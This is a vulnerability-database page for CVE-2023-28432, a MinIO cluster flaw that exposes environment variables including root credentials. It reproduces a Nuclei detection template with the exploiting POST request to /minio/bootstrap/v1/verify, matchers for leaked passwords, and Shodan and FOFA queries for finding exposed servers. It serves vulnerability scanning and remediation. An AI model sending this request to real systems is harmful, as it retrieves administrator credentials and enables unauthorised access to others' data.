Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-28432
HistoryMar 23, 2023 - 3:45 p.m.

MinIO Cluster Deployment - Information Disclosure

2023-03-2315:45:48
ProjectDiscovery
github.com
25
cve
cve2023
minio
console
exposure
kev
information
authorization
vulnerability
cluster

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

7.5

Confidence

High

EPSS

0.853

Percentile

98.6%

MinIO is susceptible to information disclosure. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. All users of distributed deployment are impacted.
id: CVE-2023-28432

info:
  name: MinIO Cluster Deployment - Information Disclosure
  author: Mr-xn
  severity: high
  description: |
    MinIO is susceptible to information disclosure. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. All users of distributed deployment are impacted.
  impact: |
    An attacker can gain unauthorized access to sensitive information stored in the MinIO cluster.
  remediation: All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z.
  reference:
    - https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q
    - https://github.com/minio/minio/pull/16853/files
    - https://github.com/golang/vulndb/issues/1667
    - https://github.com/CVEProject/cvelist/blob/master/2023/28xxx/CVE-2023-28432.json
    - https://nvd.nist.gov/vuln/detail/CVE-2023-28432
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-28432
    cwe-id: CWE-200,NVD-CWE-noinfo
    epss-score: 0.93873
    epss-percentile: 0.9913
    cpe: cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: minio
    product: minio
    shodan-query:
      - title:"Minio Console"
      - http.title:"minio browser"
      - cpe:"cpe:2.3:a:minio:minio"
      - http.title:"minio console"
    fofa-query:
      - app="Minio"
      - app="minio"
      - title="minio browser"
      - title="minio console"
    google-query:
      - intitle:"minio browser"
      - intitle:"minio console"
  tags: cve,cve2023,minio,console,exposure,kev

http:
  - raw:
      - |+
        POST /minio/bootstrap/v1/verify HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"MINIO_ROOT_PASSWORD":'
          - '"MINIO_ROOT_USER":'
          - '"MinioEnv":'
        condition: or

      - type: word
        part: header
        words:
          - 'text/plain'

      - type: status
        status:
          - 200
# digest: 490a0046304402204918fcacd2dd44975dd3bc7b60d45dabff1ae1ab08929be54428b57a9a5d953c022070c97f7fed976c184f8c5b4f10b28dd36fb1acdbe6eb625b45b272ce39401e15:922c64590222798bb761d5b6d8e72950

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

7.5

Confidence

High

EPSS

0.853

Percentile

98.6%